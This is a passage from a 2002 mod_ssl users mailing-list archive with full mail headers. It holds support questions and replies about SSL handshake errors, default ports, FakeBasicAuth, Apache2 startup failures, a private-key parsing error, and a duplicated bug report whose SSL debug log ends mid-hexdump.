[13/Jun/2002 11:18:18 11431] [info]  Awaiting re-negotiation handshake
[13/Jun/2002 11:18:18 11431] [error] Re-negotiation handshake failed: Not
accepted by client!?
[13/Jun/2002 11:18:18 11431] [error] SSL error on writing data (OpenSSL
library error follows)
[13/Jun/2002 11:18:18 11431] [error] OpenSSL: error:1409E0E5:SSL
routines:SSL3_WRITE_BYTES:ssl handshake failure

or

[13/Jun/2002 11:06:08 32598] [info]  Seeding PRNG with 23177 bytes of
entropy
[13/Jun/2002 11:06:10 32598] [error] SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[13/Jun/2002 11:06:10 32598] [error] System: Connection reset by peer
(errno: 104)

Thanks for any advice
Libor

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 12:44:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA13260; Thu, 13 Jun 2002 12:43:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail5.nc.rr.com id MAA13229; Thu, 13 Jun 2002 12:42:55 +0200 (MET DST)
Received: from mail pickup service by mail5.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 06:39:40 -0400
Received: from mail pickup service by mail5.nc.rr.com with Microsoft SMTPSVC;
	 Tue, 11 Jun 2002 15:35:26 -0400
Received: from ncmx01.mgw.rr.com ([24.93.67.251]) by mail5.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Mon, 10 Jun 2002 15:05:06 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx01.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5AJ55tH012617
	for ; Mon, 10 Jun 2002 15:05:05 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id 7CA88194FC; Mon, 10 Jun 2002 21:04:08 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 3ACD219345
	for ; Mon, 10 Jun 2002 21:04:08 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA03883; Mon, 10 Jun 2002 21:03:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from seraph2.grc.nasa.gov id VAA03830; Mon, 10 Jun 2002 21:02:37 +0200 (MET DST)
Received: from lombok-fi.lerc.nasa.gov (lombok-fi.lerc.nasa.gov [139.88.112.33])
	by seraph2.grc.nasa.gov (Postfix) with ESMTP id 279A3C690E
	for ; Mon, 10 Jun 2002 15:02:31 -0400 (EDT)
Received: from salderman.lerc.nasa.gov (salderman.lerc.nasa.gov [139.88.188.22])
	by lombok-fi.lerc.nasa.gov (NASA GRC 8.12.3/8.12.3) with ESMTP id g5AJ2Ura006875
	for ; Mon, 10 Jun 2002 15:02:30 -0400 (EDT)
Received: (smalder@localhost) by salderman.lerc.nasa.gov (NASA LeRC 8.7.4.1/2.01-local)
        id PAA31197; Mon, 10 Jun 2002 15:02:30 -0400
X-Authentication-Warning: salderman.lerc.nasa.gov: smalder set sender to sean.m.alderman@grc.nasa.gov using -f
Subject: Re: Testing with a dummy certificate...
From: Sean M Alderman 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.6.99 
Date: 10 Jun 2002 15:02:30 -0400
Message-Id: <1023735750.1515.70.camel@salderman.lerc.nasa.gov>
Mime-Version: 1.0
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sean M Alderman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I guess that makes sense.  This box we're putting it on already has
Tomcat and Inktomi's search engine fighting for 8080 and the surrounding
ports...  Not that they're any of them are difficult to change, but it
presented an interesting configuration glitch when I missed that second
port statement in the config.

On Mon, 2002-06-10 at 12:06, Geoff Thorpe wrote:
> Hi there,
> 
> On 10 Jun 2002, Sean M Alderman wrote:
> 
> > Opps...Nevermind, I just found that I had missed changing one line in
> > the conf/httpd.conf to change the port number from 8443 to 443.
> >
> > Is there are a reason why the config defaults to ports 8080 and 8443
> > instead of 80 and 443?
> 
> You can only start services on ports below 1024 if you are root. At least
> it's that way on respectable systems. :-) The default to 8080 and 8443
> assumes that, like everything else (default index.html(s), dummy certs),
> it should install some kind of template installation for you to test with
> and change rather than trying to configure anything production-like. It
> also reduces the chance that it conflicts with any system-wide running
> web-server upon installation.
> 
> Cheers,
> Geoff
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Sean M. Alderman
ITRACK Systems Analyst
PACE/NCI - NASA Glenn Research Center
(216) 433-2795

Calling a windowed operating system "Windows" is like naming an
automobile "Wheels."
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 14:04:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA20016; Thu, 13 Jun 2002 14:03:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail7.nc.rr.com id OAA19902; Thu, 13 Jun 2002 14:02:26 +0200 (MET DST)
Received: from mail pickup service by mail7.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 07:23:09 -0400
Received: from ncmx01.mgw.rr.com ([24.93.67.251]) by mail7.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Mon, 10 Jun 2002 12:27:42 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx01.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5AGRftH001336
	for ; Mon, 10 Jun 2002 12:27:41 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id 74DD019387; Mon, 10 Jun 2002 18:27:15 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 4D71F19345
	for ; Mon, 10 Jun 2002 18:27:15 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA24857; Mon, 10 Jun 2002 18:26:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.cnaf.infn.it id SAA24820; Mon, 10 Jun 2002 18:25:37 +0200 (MET DST)
Received: from cnaf.infn.it (sherlock.cnaf.infn.it [131.154.3.82])
	(authenticated bits=0)
	by iris.cnaf.infn.it (8.12.2/8.12.2) with ESMTP id g5AGOeQ6004654
	(version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NO)
	for ; Mon, 10 Jun 2002 18:24:42 +0200
Message-ID: <3D04D2E2.C7BFF2BE@cnaf.infn.it>
Date: Mon, 10 Jun 2002 18:25:06 +0200
From: "luca dell'agnello" 
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: fakebasicauth
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Sender: "luca dell'agnello" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "luca dell'agnello" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi
I would like to use FakeBasicAuth in conjunction with mod_auth_mysql in
order to check for DN in a db.
Any hints ?

TIA

luca

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 14:17:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA21114; Thu, 13 Jun 2002 14:16:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail7.nc.rr.com id OAA21091; Thu, 13 Jun 2002 14:15:45 +0200 (MET DST)
Received: from mail pickup service by mail7.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 07:31:49 -0400
Received: from ncmx01.mgw.rr.com ([24.93.67.251]) by mail7.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Mon, 10 Jun 2002 12:31:46 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx01.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5AGVjtH018991
	for ; Mon, 10 Jun 2002 12:31:45 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id EA71719590; Mon, 10 Jun 2002 18:31:18 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id C249D1958F
	for ; Mon, 10 Jun 2002 18:31:18 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA25113; Mon, 10 Jun 2002 18:30:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id SAA25031; Mon, 10 Jun 2002 18:29:13 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Mon, 10 Jun 2002 09:29:36 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Mon, 10 Jun 2002 09:29:02 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Mon, 10 Jun 2002 09:28:43 -0700
From: "Jeff Landers" 
To: 
Subject: apache2 won't start
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA25103
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

As this rookie creeps ever closer to getting it to run, I keep coming up with problems that I am sure someone has seen before. Thanks for the help.

Apache 2036
ssl      096c
on solaris 8




 ./bin/apachectl startssl
[Mon Jun 10 10:19:51 2002] [crit] [Mon Jun 10 10:19:51 2002] file vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
Abort - core dumped
./bin/apachectl startssl: httpd could not be started


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 14:41:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA22365; Thu, 13 Jun 2002 14:40:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA22352; Thu, 13 Jun 2002 14:40:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C646A4CE778; Thu, 13 Jun 2002 14:39:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E04712898B; Thu, 13 Jun 2002 14:38:27 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from MAIL2.trans-it.de id KAA00953; Thu, 13 Jun 2002 10:04:40 +0200 (MET DST)
Received: from [145.228.60.90] by MAIL2.ntmail.trans-it.net (NTMail 7.00.0018/LG0061.00.9518a920) with ESMTP id bsnembaa for modssl-users@modssl.org; Thu, 13 Jun 2002 09:51:08 +0200
From: "Andre Steffens" 
To: "Apache mod_ssl" 
Cc: 
Subject: AW: Apache2 with SSL doesn't start
Date: Thu, 13 Jun 2002 09:52:58 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Steffens" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> > I've installed Apache 2.0.36 with mod_ssl on Win2k. After I create a
> > certificate I now have the files test.cert and test.key.
> > But the Apache doesn't start! Someone who know what I've to do?
>
> What does the error log say?

[Thu Jun 13 09:50:05 2002] [error] mod_ssl: Init: PassPhraseDialog BuiltIn
not supported in server private key from file
D:/server/Apache2/conf/ssl/test.key (OpenSSL library error follows)
[Thu Jun 13 09:50:05 2002] [error] OpenSSL: error:0D084069:asn1 encoding
routines:d2i_ASN1_SET:bad tag
[Thu Jun 13 09:50:06 2002] [error] OpenSSL: error:0D09D082:asn1 encoding
routines:d2i_RSAPrivateKey:parsing
[Thu Jun 13 09:50:06 2002] [error] OpenSSL: error:0D09B00D:asn1 encoding
routines:d2i_PrivateKey:ASN1 lib
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 14:41:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA22368; Thu, 13 Jun 2002 14:40:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA22348; Thu, 13 Jun 2002 14:40:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B770B4CE777; Thu, 13 Jun 2002 14:39:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C387428991; Thu, 13 Jun 2002 14:38:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id OAA19622; Thu, 13 Jun 2002 14:00:12 +0200 (MET DST)
Date: Thu, 13 Jun 2002 14:00:12 +0200 (MET DST)
Message-Id: <200206131200.OAA19622@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] I/O Error when using https (PR#715)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Stephan PAVEK, Mag.
Version: 2.8.1
OS: Win NT 40
Submission from: (NULL) (193.83.101.90)


We are running a web-application using SSL. The environment is as follows: IAS
1.0.2.2.2 (ORACLE) using Apache (v 1.3.19) and open_ssl (v 0.9.5a) on an
AIX-Machine, ORACLE-DB v. 8.1.7.3.
Using IE Explore > 5.01 (we didn't test older versions) we get I/O errors in the
log-file (ssl_engine_log). We got the following log-entries. These error result
in empty pages on the Browser (

+-------------------------------------------------------------------------+
[10/Jun/2002 15:43:06 35008] [debug] OpenSSL: read 813/18437 bytes from
BIO#202FF4B8 [mem: 204557C8] (BIO dump follows)
+-------------------------------------------------------------------------+
| 0000: 17 03 01 03 28 8a f8 91-2e 50 78 b0 02 4e 23 68  ....(....Px..N#h |
| 0010: 53 95 8f 7d d4 55 24 ab-e4 66 88 59 6f 78 05 d5  S..}.U$..f.Yox.. |
| 0020: 50 01 e2 96 ac 8c 8f 08-5e 68 12 9b 27 68 22 75  P.......^h..'h"u |
| 0030: 24 80 cc 2a 13 82 eb 4b-01 82 93 78 45 c3 66 1c  $..*...K...xE.f. |
| 0040: 22 fa 3f a1 9a 78 1c a7-ce 66 98 ab f0 4b e9 38  ".?..x...f...K.8 |
| 0050: 88 03 ce 16 12 33 6a 74-e2 8a df 5e d5 3f 98 58  .....3jt...^.?.X |
| 0060: 80 d5 5a ba ab bf 2e 3e-53 7c 14 60 4e b8 a0 03  ..Z....>S|.`N... |
| 0070: 9d 62 fc 5f 1d fc ca c7-5e ac 53 b7 46 e5 6f 8c  .b._....^.S.F.o. |
| 0080: d1 87 36 8b b4 73 5f 24-d8 63 f9 a5 a3 dd 28 38  ..6..s_$.c....(8 |
| 0090: 75 54 0c c7 28 7b c1 ba-fe c9 21 d6 dd ce 8d ed  uT..({....!..... |
| 00a0: fb 6c ab cd 76 de dc 64-b4 9a 02 ea 2f f4 c1 4a  .l..v..d..../..J |
| 00b0: a0 64 88 af b3 b8 cb 18-42 9f cb 38 8f 37 a0 43  .d......B..8.7.C |
| 00c0: 43 f6 eb bc 6f 4e bd 7c-63 fc 11 4a f4 a3 1e 56  C...oN.|c..J...V |
| 00d0: 2d 54 2e fc 32 da 93 77-de 0a 74 6f be 73 06 2d  -T..2..w..to.s.- |
| 00e0: 9d 9a 8f 9f b6 ff 80 33-24 c0 af 47 d2 37 af e6  .......3$..G.7.. |
| 00f0: 8c 7d a6 89 0a 1f 65 ca-d8 12 c6 7a e7 0b 30 74  .}....e....z..0t |
| 0100: f2 30 c9 df be 15 79 80-de f2 33 8c 4f ba fc 2f  .0....y...3.O../ |
| 0110: 30 96 d9 f4 ac 39 f5 8a-43 f6 0a 16 71 db ee 5d  0....9..C...q..] |
| 0120: 31 a7 31 d6 95 99 c0 b8-83 90 4d 09 da 65 91 77  1.1.......M..e.w |
| 0130: f6 aa ea 0c a2 c5 2a a0-a4 e7 95 52 85 53 4a b0  ......*....R.SJ. |
| 0140: 3f 27 b1 f3 90 7d cd 6f-ca ec de 49 4e c8 9f 6e  ?'...}.o...IN..n |
| 0150: ee 84 ae 9e a1 a0 ab 26-88 f8 e3 ee 12 e0 68 d3  .......&......h. |
| 0160: 27 a0 33 13 8e be 4d 45-8d 96 14 2b f9 3f 76 8b  '.3...ME...+.?v. |
| 0170: 8e 1b 06 bb 02 54 8a 29-99 e8 29 bd 68 13 41 c0  .....T.)..).h.A. |
| 0180: 49 0c e0 81 a9 19 45 3d-00 96 21 4c d6 08 74 43  I.....E=..!L..tC |
| 0190: ca 1d 3d 87 cd 1d 1a 5a-c1 33 cc 03 a6 4a 82 fd  ..=....Z.3...J.. |
| 01a0: a4 43 13 54 8a 94 45 eb-d1 5d 9e 14 b8 3f 6b 27  .C.T..E..]...?k' |
| 01b0: 67 74 c4 53 ba 55 8e ff-01 3c d1 af f2 d5 16 31  gt.S.U...<.....1 |
| 01c0: b8 69 e8 d5 ac d3 a1 3f-18 4a 51 68 d0 d8 8e 99  .i.....?.JQh.... |
| 01d0: 60 ab f9 24 12 18 d0 de-2c 0c 50 9f 91 d8 01 9b  `..$....,.P..... |
| 01e0: 8e 4a f8 c7 12 ba 30 f9-11 96 0f 35 4f a7 26 84  .J....0....5O.&. |
| 01f0: a6 c7 90 ff b4 17 ff 1f-be 71 b9 85 61 c3 60 85  .........q..a.`. |
| 0200: 7b 20 e9 31 d9 2e b5 d6-0b eb 01 4a d8 4e 22 24  { .1.......J.N"$ |
| 0210: 59 09 49 6b 1a 5d f3 23-80 4e b6 4a 7f 46 6d 8a  Y.Ik.].#.N.J.Fm. |
| 0220: 8f 85 2b ef 4b cf db a6-89 52 72 c8 2b 74 ac 79  ..+.K....Rr.+t.y |
| 0230: 8f 5e 4a 9b 72 ea fc a4-f6 85 9b b4 6a 16 c3 d8  .^J.r.......j... |
| 0240: 1f 07 b8 aa ce 15 33 cb-7c fe de e3 9f 02 15 5c  ......3.|......\ |
| 0250: 91 3a bc 1b a7 79 f1 5e-eb b9 63 12 9d 29 21 5c  .:...y.^..c..)!\ |
| 0260: bb 3d 88 58 c9 56 19 41-2b 0d 88 09 df 2d 40 e7  .=.X.V.A+....-@. |
| 0270: ef e9 23 4b 93 d9 b0 f7-bb e7 c6 f4 df 93 db 96  ..#K............ |
| 0280: 2a 00 cc ee da aa 4e dd-6c d4 36 d3 ec d4 ac c1  *.....N.l.6..... |
| 0290: fa ba cb 06 71 60 6f 1b-11 ea 90 e7 d0 89 38 53  ....q`o.......8S |
| 02a0: dc 7c 36 0e a1 ee 43 21-bb 23 f0 50 12 41 db a5  .|6...C!.#.P.A.. |
| 02b0: e2 d5 86 1d 89 0b 33 e2-6f 60 4f 17 52 9a c3 d2  ......3.o`O.R... |
| 02c0: e2 3d 80 c9 a7 b2 a4 ba-40 39 60 86 a4 e6 b5 e3  .=......@9`..... |
| 02d0: 08 2a 38 54 51 8d 80 a7-f0 8c f5 c6 b1 1d 5f e6  .*8TQ........._. |
| 02e0: d8 ad 33 d1 c3 8a 8d c9-ed 35 d6 51 fd 7f a2 5a  ..3......5.Q...Z |
| 02f0: a8 5b d3 1f 84 94 31 16-0a d9 6a 7c 82 2b c7 32  .[....1...j|.+.2 |
| 0300: 9b 9c 1b 9b 4a 01 f1 ce-c9 36 aa 04 91 b9 12 77  ....J....6.....w |
| 0310: 0d 64 77 07 6e c3 ee 02-e2 c5 11 73 a8 66 5c 92  .dw.n......s.f\. |
| 0320: de 41 1c fa 5e 57 b3 d0-f0 92 e5 2f 4a           .A..^W...../J    |
+-------------------------------------------------------------------------+
[10/Jun/2002 15:43:06 35008] [info]  Subsequent (No.2) HTTPS request received
for child 9 (server card.omv.com:443)
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 18437 bytes expected to
read on BIO#202FF4B8 [mem: 2045B828]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [info]  Connection to child 1 closed with standard
shutdown (server card.omv.com:443, client 10.2.140.73)
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 18437 bytes expected to
read on BIO#202FF4B8 [mem: 204557C8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [info]  Connection to child 8 closed with standard
shutdown (server card.omv.com:443, client 10.2.140.73)
[10/Jun/2002 15:43:06 35008] [debug] OpenSSL: write 360/360 bytes to
BIO#202FF4B8 [mem: 2045DFD8] (BIO dump follows)
+-------------------------------------------------------------------------+
|

We are using PL/SQL Server Pages (PSP) containing javascript and html code.
Running the application without SSL does NOT cause errors!
Are there any settings in the httpd.conf file for using IE and PSPs?

Thanx in advance for your help!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 14:41:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA22378; Thu, 13 Jun 2002 14:40:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA22347; Thu, 13 Jun 2002 14:40:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A1B454CE742; Thu, 13 Jun 2002 14:39:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 7B0DC28981; Thu, 13 Jun 2002 14:38:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from mail5.nc.rr.com id NAA19540; Thu, 13 Jun 2002 13:59:50 +0200 (MET DST)
Received: from mail pickup service by mail5.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 07:48:17 -0400
Received: from mail pickup service by mail5.nc.rr.com with Microsoft SMTPSVC;
	 Tue, 11 Jun 2002 15:47:35 -0400
Received: from ncmx02.mgw.rr.com ([24.93.67.222]) by mail5.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Mon, 10 Jun 2002 15:37:46 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx02.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5AIkuIa019641
	for ; Mon, 10 Jun 2002 14:46:56 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id 0174419595; Mon, 10 Jun 2002 20:34:38 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 21B6719593
	for ; Mon, 10 Jun 2002 20:34:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA01613; Mon, 10 Jun 2002 20:34:03 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA01324; Mon, 10 Jun 2002 20:30:57 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 358F34CE790; Mon, 10 Jun 2002 20:30:57 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8A8D128973; Mon, 10 Jun 2002 19:51:25 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id QAA15580; Mon, 10 Jun 2002 16:24:07 +0200 (MET DST)
Date: Mon, 10 Jun 2002 16:24:07 +0200 (MET DST)
Message-Id: <200206101424.QAA15580@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] I/O Error when using https (PR#715)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Stephan PAVEK, Mag.
Version: 2.8.1
OS: Win NT 40
Submission from: (NULL) (193.83.101.90)


We are running a web-application using SSL. The environment is as follows: IAS
1.0.2.2.2 (ORACLE) using Apache (v 1.3.19) and open_ssl (v 0.9.5a) on an
AIX-Machine, ORACLE-DB v. 8.1.7.3.
Using IE Explore > 5.01 (we didn't test older versions) we get I/O errors in the
log-file (ssl_engine_log). We got the following log-entries. These error result
in empty pages on the Browser (

+-------------------------------------------------------------------------+
[10/Jun/2002 15:43:06 35008] [debug] OpenSSL: read 813/18437 bytes from
BIO#202FF4B8 [mem: 204557C8] (BIO dump follows)
+-------------------------------------------------------------------------+
| 0000: 17 03 01 03 28 8a f8 91-2e 50 78 b0 02 4e 23 68  ....(....Px..N#h |
| 0010: 53 95 8f 7d d4 55 24 ab-e4 66 88 59 6f 78 05 d5  S..}.U$..f.Yox.. |
| 0020: 50 01 e2 96 ac 8c 8f 08-5e 68 12 9b 27 68 22 75  P.......^h..'h"u |
| 0030: 24 80 cc 2a 13 82 eb 4b-01 82 93 78 45 c3 66 1c  $..*...K...xE.f. |
| 0040: 22 fa 3f a1 9a 78 1c a7-ce 66 98 ab f0 4b e9 38  ".?..x...f...K.8 |
| 0050: 88 03 ce 16 12 33 6a 74-e2 8a df 5e d5 3f 98 58  .....3jt...^.?.X |
| 0060: 80 d5 5a ba ab bf 2e 3e-53 7c 14 60 4e b8 a0 03  ..Z....>S|.`N... |
| 0070: 9d 62 fc 5f 1d fc ca c7-5e ac 53 b7 46 e5 6f 8c  .b._....^.S.F.o. |
